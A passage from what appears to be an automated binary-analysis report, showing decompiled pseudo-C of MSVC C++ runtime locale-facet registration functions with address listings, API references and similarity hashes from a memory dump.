																																					 *((intOrPtr*)( *((intOrPtr*)( *_t606 + 4))))();
																																					 *0x6e221714 = _t606;
																																					goto L75;
																																				}
																																			} else {
																																				_t606 = _t623;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t605 =  *(_t646 - 0x10);
																																		 *(_t646 - 0x10) = _t605;
																																		 *(_t646 - 4) = 1;
																																		E6E1911C1(__eflags, _t605);
																																		 *0x6e1ee1b4();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t605 + 4))))();
																																		 *0x6e2216e8 = _t605;
																																		goto L68;
																																	}
																																} else {
																																	_t605 = _t622;
																																	goto L68;
																																}
																															}
																														} else {
																															_t604 =  *(_t646 - 0x10);
																															 *(_t646 - 0x10) = _t604;
																															 *(_t646 - 4) = 1;
																															E6E1911C1(__eflags, _t604);
																															 *0x6e1ee1b4();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t604 + 4))))();
																															 *0x6e221710 = _t604;
																															goto L61;
																														}
																													} else {
																														_t604 = _t621;
																														goto L61;
																													}
																												}
																											} else {
																												_t603 =  *(_t646 - 0x10);
																												 *(_t646 - 0x10) = _t603;
																												 *(_t646 - 4) = 1;
																												E6E1911C1(__eflags, _t603);
																												 *0x6e1ee1b4();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t603 + 4))))();
																												 *0x6e2216fc = _t603;
																												goto L54;
																											}
																										} else {
																											_t603 = _t620;
																											goto L54;
																										}
																									}
																								} else {
																									_t602 =  *(_t646 - 0x10);
																									 *(_t646 - 0x10) = _t602;
																									 *(_t646 - 4) = 1;
																									E6E1911C1(__eflags, _t602);
																									 *0x6e1ee1b4();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t602 + 4))))();
																									 *0x6e221700 = _t602;
																									goto L47;
																								}
																							} else {
																								_t602 = _t619;
																								goto L47;
																							}
																						}
																					} else {
																						_t601 =  *(_t646 - 0x10);
																						 *(_t646 - 0x10) = _t601;
																						 *(_t646 - 4) = 1;
																						E6E1911C1(__eflags, _t601);
																						 *0x6e1ee1b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t601 + 4))))();
																						 *0x6e22172c = _t601;
																						goto L40;
																					}
																				} else {
																					_t601 = _t618;
																					goto L40;
																				}
																			}
																		} else {
																			_t600 =  *(_t646 - 0x10);
																			 *(_t646 - 0x10) = _t600;
																			 *(_t646 - 4) = 1;
																			E6E1911C1(__eflags, _t600);
																			 *0x6e1ee1b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t600 + 4))))();
																			 *0x6e221730 = _t600;
																			goto L33;
																		}
																	} else {
																		_t600 = _t617;
																		goto L33;
																	}
																}
															} else {
																_t599 =  *(_t646 - 0x10);
																 *(_t646 - 0x10) = _t599;
																 *(_t646 - 4) = 1;
																E6E1911C1(__eflags, _t599);
																 *0x6e1ee1b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t599 + 4))))();
																 *0x6e2216f8 = _t599;
																goto L26;
															}
														} else {
															_t599 = _t616;
															goto L26;
														}
													}
												} else {
													_t598 =  *(_t646 - 0x10);
													 *(_t646 - 0x10) = _t598;
													 *(_t646 - 4) = 1;
													E6E1911C1(__eflags, _t598);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t598 + 4))))();
													 *0x6e221728 = _t598;
													goto L19;
												}
											} else {
												_t598 = _t615;
												goto L19;
											}
										}
									} else {
										_t597 =  *(_t646 - 0x10);
										 *(_t646 - 0x10) = _t597;
										 *(_t646 - 4) = 1;
										E6E1911C1(__eflags, _t597);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t597 + 4))))();
										 *0x6e2216f4 = _t597;
										goto L12;
									}
								} else {
									_t597 = _t614;
									goto L12;
								}
							}
						} else {
							_t596 =  *(_t646 - 0x10);
							 *(_t646 - 0x10) = _t596;
							 *(_t646 - 4) = 1;
							E6E1911C1(__eflags, _t596);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t596 + 4))))();
							 *0x6e221724 = _t596;
							goto L5;
						}
					} else {
						_t596 = _t613;
						goto L5;
					}
				}
			}

0x6e198ff6
0x6e198ffd
0x6e199007
0x6e19900c
0x6e199017
0x6e19901b
0x6e199027
0x6e19902c
0x6e199030
0x6e199075
0x6e199078
0x6e199084
0x6e199032
0x6e199034
0x6e19903a
0x6e199040
0x6e199048
0x6e19904b
0x6e199085
0x6e19908a
0x6e199092
0x6e19909c
0x6e1990a1
0x6e1990ac
0x6e1990b0
0x6e1990c1
0x6e1990c3
0x6e1990c5
0x6e19910a
0x6e19910d
0x6e199119
0x6e1990c7
0x6e1990c7
0x6e1990c9
0x6e1990cf
0x6e1990d5
0x6e1990dd
0x6e1990e0
0x6e19911a
0x6e19911f
0x6e199127
0x6e199131
0x6e199136
0x6e199141
0x6e199145
0x6e199156
0x6e199158
0x6e19915a
0x6e19919f
0x6e1991a2
0x6e1991ae
0x6e19915c
0x6e19915c
0x6e19915e
0x6e199164
0x6e19916a
0x6e199172
0x6e199175
0x6e1991af
0x6e1991b4
0x6e1991bc
0x6e1991c6
0x6e1991cb
0x6e1991d6
0x6e1991da
0x6e1991eb
0x6e1991ed
0x6e1991ef
0x6e199234
0x6e199237
0x6e199243
0x6e1991f1
0x6e1991f1
0x6e1991f3
0x6e1991f9
0x6e1991ff
0x6e199207
0x6e19920a
0x6e199244
0x6e199249
0x6e199251
0x6e19925b
0x6e199260
0x6e19926b
0x6e19926f
0x6e199280
0x6e199282
0x6e199284
0x6e1992c9
0x6e1992cc
0x6e1992d8
0x6e199286
0x6e199286
0x6e199288
0x6e19928e
0x6e199294
0x6e19929c
0x6e19929f
0x6e1992d9
0x6e1992de
0x6e1992e6
0x6e1992f0
0x6e1992f5
0x6e199300
0x6e199304
0x6e199315
0x6e199317
0x6e199319
0x6e19935e
0x6e199361
0x6e19936d
0x6e19931b
0x6e19931b
0x6e19931d
0x6e199323
0x6e199329
0x6e199331
0x6e199334
0x6e19936e
0x6e199373
0x6e19937b
0x6e199385
0x6e19938a
0x6e199395
0x6e199399
0x6e1993aa
0x6e1993ac
0x6e1993ae
0x6e1993f3
0x6e1993f6
0x6e199402
0x6e1993b0
0x6e1993b0
0x6e1993b2
0x6e1993b8
0x6e1993be
0x6e1993c6
0x6e1993c9
0x6e199403
0x6e199408
0x6e199410
0x6e19941a
0x6e19941f
0x6e19942a
0x6e19942e
0x6e19943f
0x6e199441
0x6e199443
0x6e199488
0x6e19948b
0x6e199497
0x6e199445
0x6e199445
0x6e199447
0x6e19944d
0x6e199453
0x6e19945b
0x6e19945e
0x6e199498
0x6e19949d
0x6e1994a5
0x6e1994af
0x6e1994b4
0x6e1994bf
0x6e1994c3
0x6e1994d4
0x6e1994d6
0x6e1994d8
0x6e19951d
0x6e199520
0x6e19952c
0x6e1994da
0x6e1994da
0x6e1994dc
0x6e1994e2
0x6e1994e8
0x6e1994f0
0x6e1994f3
0x6e19952d
0x6e199532
0x6e19953a
0x6e199544
0x6e199549
0x6e199554
0x6e199558
0x6e199569
0x6e19956b
0x6e19956d
0x6e1995b2
0x6e1995b5
0x6e1995c1
0x6e19956f
0x6e19956f
0x6e199571
0x6e199577
0x6e19957d
0x6e199585
0x6e199588
0x6e1995c2
0x6e1995c7
0x6e1995cf
0x6e1995d9
0x6e1995de
0x6e1995e9
0x6e1995ed
0x6e1995fe
0x6e199600
0x6e199602
0x6e199647
0x6e19964a
0x6e199656
0x6e199604
0x6e199604
0x6e199606
0x6e19960c
0x6e199612
0x6e19961a
0x6e19961d
0x6e199657
0x6e19965c
0x6e199664
0x6e19966e
0x6e199673
0x6e19967e
0x6e199682
0x6e199693
0x6e199695
0x6e199697
0x6e1996dc
0x6e1996df
0x6e1996eb
0x6e199699
0x6e199699
0x6e19969b
0x6e1996a1
0x6e1996a7
0x6e1996af
0x6e1996b2
0x6e1996ec
0x6e1996f1
0x6e1996f9
0x6e199703
0x6e199708
0x6e199713
0x6e199717
0x6e199728
0x6e19972a
0x6e19972c
0x6e199771
0x6e199774
0x6e199780
0x6e19972e
0x6e19972e
0x6e199730
0x6e199736
0x6e19973c
0x6e199744
0x6e199747
0x6e199781
0x6e199786
0x6e19978e
0x6e199798
0x6e19979d
0x6e1997a8
0x6e1997ac
0x6e1997bd
0x6e1997bf
0x6e1997c1
0x6e199806
0x6e199809
0x6e199815
0x6e1997c3
0x6e1997c3
0x6e1997c5
0x6e1997cb
0x6e1997d1
0x6e1997d9
0x6e1997dc
0x6e199816
0x6e19981b
0x6e199823
0x6e19982d
0x6e199832
0x6e19983d
0x6e199841
0x6e199852
0x6e199854
0x6e199856
0x6e19989b
0x6e19989e
0x6e1998aa
0x6e199858
0x6e199858
0x6e19985a
0x6e199860
0x6e199866
0x6e19986e
0x6e199871
0x6e1998ab
0x6e1998b0
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e7
0x6e1998e9
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef
0x6e199873
0x6e199873
0x6e199876
0x6e19987a
0x6e19987e
0x6e19988b
0x6e199893
0x6e199895
0x00000000
0x6e199895
0x6e19985c
0x6e19985c
0x00000000
0x6e19985c
0x6e19985a
0x6e1997de
0x6e1997de
0x6e1997e1
0x6e1997e5
0x6e1997e9
0x6e1997f6
0x6e1997fe
0x6e199800
0x00000000
0x6e199800
0x6e1997c7
0x6e1997c7
0x00000000
0x6e1997c7
0x6e1997c5
0x6e199749
0x6e199749
0x6e19974c
0x6e199750
0x6e199754
0x6e199761
0x6e199769
0x6e19976b
0x00000000
0x6e19976b
0x6e199732
0x6e199732
0x00000000
0x6e199732
0x6e199730
0x6e1996b4
0x6e1996b4
0x6e1996b7
0x6e1996bb
0x6e1996bf
0x6e1996cc
0x6e1996d4
0x6e1996d6
0x00000000
0x6e1996d6
0x6e19969d
0x6e19969d
0x00000000
0x6e19969d
0x6e19969b
0x6e19961f
0x6e19961f
0x6e199622
0x6e199626
0x6e19962a
0x6e199637
0x6e19963f
0x6e199641
0x00000000
0x6e199641
0x6e199608
0x6e199608
0x00000000
0x6e199608
0x6e199606
0x6e19958a
0x6e19958a
0x6e19958d
0x6e199591
0x6e199595
0x6e1995a2
0x6e1995aa
0x6e1995ac
0x00000000
0x6e1995ac
0x6e199573
0x6e199573
0x00000000
0x6e199573
0x6e199571
0x6e1994f5
0x6e1994f5
0x6e1994f8
0x6e1994fc
0x6e199500
0x6e19950d
0x6e199515
0x6e199517
0x00000000
0x6e199517
0x6e1994de
0x6e1994de
0x00000000
0x6e1994de
0x6e1994dc
0x6e199460
0x6e199460
0x6e199463
0x6e199467
0x6e19946b
0x6e199478
0x6e199480
0x6e199482
0x00000000
0x6e199482
0x6e199449
0x6e199449
0x00000000
0x6e199449
0x6e199447
0x6e1993cb
0x6e1993cb
0x6e1993ce
0x6e1993d2
0x6e1993d6
0x6e1993e3
0x6e1993eb
0x6e1993ed
0x00000000
0x6e1993ed
0x6e1993b4
0x6e1993b4
0x00000000
0x6e1993b4
0x6e1993b2
0x6e199336
0x6e199336
0x6e199339
0x6e19933d
0x6e199341
0x6e19934e
0x6e199356
0x6e199358
0x00000000
0x6e199358
0x6e19931f
0x6e19931f
0x00000000
0x6e19931f
0x6e19931d
0x6e1992a1
0x6e1992a1
0x6e1992a4
0x6e1992a8
0x6e1992ac
0x6e1992b9
0x6e1992c1
0x6e1992c3
0x00000000
0x6e1992c3
0x6e19928a
0x6e19928a
0x00000000
0x6e19928a
0x6e199288
0x6e19920c
0x6e19920c
0x6e19920f
0x6e199213
0x6e199217
0x6e199224
0x6e19922c
0x6e19922e
0x00000000
0x6e19922e
0x6e1991f5
0x6e1991f5
0x00000000
0x6e1991f5
0x6e1991f3
0x6e199177
0x6e199177
0x6e19917a
0x6e19917e
0x6e199182
0x6e19918f
0x6e199197
0x6e199199
0x00000000
0x6e199199
0x6e199160
0x6e199160
0x00000000
0x6e199160
0x6e19915e
0x6e1990e2
0x6e1990e2
0x6e1990e5
0x6e1990e9
0x6e1990ed
0x6e1990fa
0x6e199102
0x6e199104
0x00000000
0x6e199104
0x6e1990cb
0x6e1990cb
0x00000000
0x6e1990cb
0x6e1990c9
0x6e19904d
0x6e19904d
0x6e199050
0x6e199054
0x6e199058
0x6e199065
0x6e19906d
0x6e19906f
0x00000000
0x6e19906f
0x6e199036
0x6e199036
0x00000000
0x6e199036
0x6e199034

APIs

__EH_prolog3.LIBCMT ref: 6E198FFD
std::_Lockit::_Lockit.LIBCPMT ref: 6E199007

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E199058
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199078
Concurrency::cancel_current_task.LIBCPMT ref: 6E199085

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 6480251dad5582d50fc2f18eaa1c267b87ecd812838b69d953be792aa9dda9cf
Instruction ID: 6243579b6b5e705e895e802f865cb29328ee66af3bf37011419314ccd3b0cbf8
Opcode Fuzzy Hash: 6480251dad5582d50fc2f18eaa1c267b87ecd812838b69d953be792aa9dda9cf
Instruction Fuzzy Hash: D901C435A001159FCF05DBE4C824AFE77BEAF84364F244809E825AB280CF719AC5BB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5D1E, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6E1A5D1E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t38;
				void* _t54;
				signed int _t83;
				void* _t90;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t97;
				void* _t100;

				_t71 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t100 - 0x14, 0);
				_t95 =  *0x6e221770; // 0x0
				 *(_t100 - 4) =  *(_t100 - 4) & 0x00000000;
				 *(_t100 - 0x10) = _t95;
				_t38 = E6E162171( *((intOrPtr*)(_t100 + 8)), E6E161F29(__ebx, 0x6e221754, __edi, _t95));
				_t92 = _t38;
				if(_t38 != 0) {
					L5:
					E6E18F30C(_t100 - 0x14);
					return E6E1A9D88(_t92);
				} else {
					if(_t95 == 0) {
						_push( *((intOrPtr*)(_t100 + 8)));
						_push(_t100 - 0x10);
						__eflags = E6E1A62BC(__ebx, _t92, _t95) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t71, _t92, _t95, 8);
							E6E18F2A5(_t100 - 0x14, 0);
							_t96 =  *0x6e221774; // 0x0
							 *(_t100 - 4) =  *(_t100 - 4) & 0x00000000;
							 *(_t100 - 0x10) = _t96;
							_t93 = E6E162171( *((intOrPtr*)(_t100 + 8)), E6E161F29(_t71, 0x6e221758, _t92, _t96));
							__eflags = _t93;
							if(_t93 != 0) {
								L12:
								E6E18F30C(_t100 - 0x14);
								return E6E1A9D88(_t93);
							} else {
								__eflags = _t96;
								if(_t96 == 0) {
									_push( *((intOrPtr*)(_t100 + 8)));
									_push(_t100 - 0x10);
									_t54 = E6E1A6328(_t71, _t93, _t96);
									_pop(_t83);
									__eflags = _t54 - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ecb1a, _t71, _t93, _t96, 4);
										_t97 = _t83;
										 *(_t100 - 0x10) = _t97;
										 *((intOrPtr*)(_t97 + 4)) =  *((intOrPtr*)(_t100 + 0xc));
										_push( *((intOrPtr*)(_t100 + 0x14)));
										_t31 = _t100 - 4;
										 *_t31 =  *(_t100 - 4) & 0x00000000;
										__eflags =  *_t31;
										 *_t97 = 0x6e1f25a4;
										 *((char*)(_t97 + 0x28)) =  *((intOrPtr*)(_t100 + 0x10));
										E6E1A7184(_t71, _t83, _t90, _t93, _t97,  *_t31);
										return E6E1A9D88(_t97,  *((intOrPtr*)(_t100 + 8)));
									} else {
										_t93 =  *(_t100 - 0x10);
										 *(_t100 - 0x10) = _t93;
										 *(_t100 - 4) = 1;
										E6E1911C1(__eflags, _t93);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t93 + 4))))();
										 *0x6e221774 = _t93;
										goto L12;
									}
								} else {
									_t93 = _t96;
									goto L12;
								}
							}
						} else {
							_t92 =  *(_t100 - 0x10);
							 *(_t100 - 0x10) = _t92;
							 *(_t100 - 4) = 1;
							E6E1911C1(__eflags, _t92);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 4))))();
							 *0x6e221770 = _t92;
							goto L5;
						}
					} else {
						_t92 = _t95;
						goto L5;
					}
				}
			}

0x6e1a5d1e
0x6e1a5d25
0x6e1a5d2f
0x6e1a5d34
0x6e1a5d3f
0x6e1a5d43
0x6e1a5d4f
0x6e1a5d54
0x6e1a5d58
0x6e1a5d9d
0x6e1a5da0
0x6e1a5dac
0x6e1a5d5a
0x6e1a5d5c
0x6e1a5d62
0x6e1a5d68
0x6e1a5d70
0x6e1a5d73
0x6e1a5dad
0x6e1a5db2
0x6e1a5dba
0x6e1a5dc4
0x6e1a5dc9
0x6e1a5dd4
0x6e1a5dd8
0x6e1a5de9
0x6e1a5deb
0x6e1a5ded
0x6e1a5e32
0x6e1a5e35
0x6e1a5e41
0x6e1a5def
0x6e1a5def
0x6e1a5df1
0x6e1a5df7
0x6e1a5dfd
0x6e1a5dfe
0x6e1a5e04
0x6e1a5e05
0x6e1a5e08
0x6e1a5e42
0x6e1a5e47
0x6e1a5e4f
0x6e1a5e54
0x6e1a5e56
0x6e1a5e5c
0x6e1a5e5f
0x6e1a5e68
0x6e1a5e68
0x6e1a5e68
0x6e1a5e6c
0x6e1a5e72
0x6e1a5e75
0x6e1a5e81
0x6e1a5e0a
0x6e1a5e0a
0x6e1a5e0d
0x6e1a5e11
0x6e1a5e15
0x6e1a5e22
0x6e1a5e2a
0x6e1a5e2c
0x00000000
0x6e1a5e2c
0x6e1a5df3
0x6e1a5df3
0x00000000
0x6e1a5df3
0x6e1a5df1
0x6e1a5d75
0x6e1a5d75
0x6e1a5d78
0x6e1a5d7c
0x6e1a5d80
0x6e1a5d8d
0x6e1a5d95
0x6e1a5d97
0x00000000
0x6e1a5d97
0x6e1a5d5e
0x6e1a5d5e
0x00000000
0x6e1a5d5e
0x6e1a5d5c

APIs

__EH_prolog3.LIBCMT ref: 6E1A5D25
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5D2F

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E1A5D80
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5DA0
Concurrency::cancel_current_task.LIBCPMT ref: 6E1A5DAD

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 9067be3ae5c0c1c7dcdebd773305989235912e30f6b5d4d57de95c100dd03434
Instruction ID: a98182c47b4f44d21e2c1cbe93dd102e3b1d75bfc74c289e3b05ad0105120b69
Opcode Fuzzy Hash: 9067be3ae5c0c1c7dcdebd773305989235912e30f6b5d4d57de95c100dd03434
Instruction Fuzzy Hash: FA01C439A00119DBCF05DBE8C814AFE777ABFC4318F244909E921AB280DF3099C5EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5DB3, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1A5DB3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t26;
				void* _t31;
				intOrPtr* _t50;
				void* _t54;
				intOrPtr* _t58;
				intOrPtr* _t59;
				void* _t61;

				_t44 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t61 - 0x14, 0);
				_t58 =  *0x6e221774; // 0x0
				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
				 *((intOrPtr*)(_t61 - 0x10)) = _t58;
				_t26 = E6E162171( *((intOrPtr*)(_t61 + 8)), E6E161F29(__ebx, 0x6e221758, __edi, _t58));
				_t56 = _t26;
				if(_t26 != 0) {
					L5:
					E6E18F30C(_t61 - 0x14);
					return E6E1A9D88(_t56);
				} else {
					if(_t58 == 0) {
						_push( *((intOrPtr*)(_t61 + 8)));
						_push(_t61 - 0x10);
						_t31 = E6E1A6328(__ebx, _t56, _t58);
						_pop(_t50);
						__eflags = _t31 - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ecb1a, _t44, _t56, _t58, 4);
							_t59 = _t50;
							 *((intOrPtr*)(_t61 - 0x10)) = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  *((intOrPtr*)(_t61 + 0xc));
							_push( *((intOrPtr*)(_t61 + 0x14)));
							_t19 = _t61 - 4;
							 *_t19 =  *(_t61 - 4) & 0x00000000;
							__eflags =  *_t19;
							 *_t59 = 0x6e1f25a4;
							 *((char*)(_t59 + 0x28)) =  *((intOrPtr*)(_t61 + 0x10));
							E6E1A7184(_t44, _t50, _t54, _t56, _t59,  *_t19);
							return E6E1A9D88(_t59,  *((intOrPtr*)(_t61 + 8)));
						} else {
							_t56 =  *((intOrPtr*)(_t61 - 0x10));
							 *((intOrPtr*)(_t61 - 0x10)) = _t56;
							 *(_t61 - 4) = 1;
							E6E1911C1(__eflags, _t56);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t56 + 4))))();
							 *0x6e221774 = _t56;
							goto L5;
						}
					} else {
						_t56 = _t58;
						goto L5;
					}
				}
			}

0x6e1a5db3
0x6e1a5dba
0x6e1a5dc4
0x6e1a5dc9
0x6e1a5dd4
0x6e1a5dd8
0x6e1a5de4
0x6e1a5de9
0x6e1a5ded
0x6e1a5e32
0x6e1a5e35
0x6e1a5e41
0x6e1a5def
0x6e1a5df1
0x6e1a5df7
0x6e1a5dfd
0x6e1a5dfe
0x6e1a5e04
0x6e1a5e05
0x6e1a5e08
0x6e1a5e42
0x6e1a5e47
0x6e1a5e4f
0x6e1a5e54
0x6e1a5e56
0x6e1a5e5c
0x6e1a5e5f
0x6e1a5e68
0x6e1a5e68
0x6e1a5e68
0x6e1a5e6c
0x6e1a5e72
0x6e1a5e75
0x6e1a5e81
0x6e1a5e0a
0x6e1a5e0a
0x6e1a5e0d
0x6e1a5e11
0x6e1a5e15
0x6e1a5e22
0x6e1a5e2a
0x6e1a5e2c
0x00000000
0x6e1a5e2c
0x6e1a5df3
0x6e1a5df3
0x00000000
0x6e1a5df3
0x6e1a5df1

APIs

__EH_prolog3.LIBCMT ref: 6E1A5DBA
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5DC4

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E1A5E15
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5E35
Concurrency::cancel_current_task.LIBCPMT ref: 6E1A5E42

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 470432da338c2cb162cbecc4e6887e489435d8adae3c54b98c48debbb5820ce5
Instruction ID: abbc079c185062a873650140a2f92367c35cf7ec132ceff4be672a5a3b8b58d0
Opcode Fuzzy Hash: 470432da338c2cb162cbecc4e6887e489435d8adae3c54b98c48debbb5820ce5
Instruction Fuzzy Hash: D101C4399001199FCF05DBE8C814AFEB7B9AF84314F244919E921AB280CF719DC9EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5ACA, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E1A5ACA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t86;
				void* _t146;
				signed int _t215;
				void* _t234;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				void* _t256;

				_t179 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t256 - 0x14, 0);
				_t243 =  *0x6e221760; // 0x0
				 *(_t256 - 4) =  *(_t256 - 4) & 0x00000000;
				 *(_t256 - 0x10) = _t243;
				_t86 = E6E162171( *((intOrPtr*)(_t256 + 8)), E6E161F29(__ebx, 0x6e221744, __edi, _t243));
				_t236 = _t86;
				if(_t86 != 0) {
					L5:
					E6E18F30C(_t256 - 0x14);
					return E6E1A9D88(_t236);
				} else {
					if(_t243 == 0) {
						_push( *((intOrPtr*)(_t256 + 8)));
						_push(_t256 - 0x10);
						__eflags = E6E1A60E3(__ebx, _t236, _t243) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t179, _t236, _t243, 8);
							E6E18F2A5(_t256 - 0x14, 0);
							_t244 =  *0x6e221764; // 0x0
							 *(_t256 - 4) =  *(_t256 - 4) & 0x00000000;
							 *(_t256 - 0x10) = _t244;
							_t237 = E6E162171( *((intOrPtr*)(_t256 + 8)), E6E161F29(_t179, 0x6e221748, _t236, _t244));
							__eflags = _t237;
							if(_t237 != 0) {
								L12:
								E6E18F30C(_t256 - 0x14);
								return E6E1A9D88(_t237);
							} else {
								__eflags = _t244;
								if(_t244 == 0) {
									_push( *((intOrPtr*)(_t256 + 8)));
									_push(_t256 - 0x10);
									__eflags = E6E1A614B(_t179, _t237, _t244) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t179, _t237, _t244, 8);
										E6E18F2A5(_t256 - 0x14, 0);
										_t245 =  *0x6e22176c; // 0x0
										 *(_t256 - 4) =  *(_t256 - 4) & 0x00000000;
										 *(_t256 - 0x10) = _t245;
										_t238 = E6E162171( *((intOrPtr*)(_t256 + 8)), E6E161F29(_t179, 0x6e221750, _t237, _t245));
										__eflags = _t238;
										if(_t238 != 0) {
											L19:
											E6E18F30C(_t256 - 0x14);
											return E6E1A9D88(_t238);
										} else {
											__eflags = _t245;
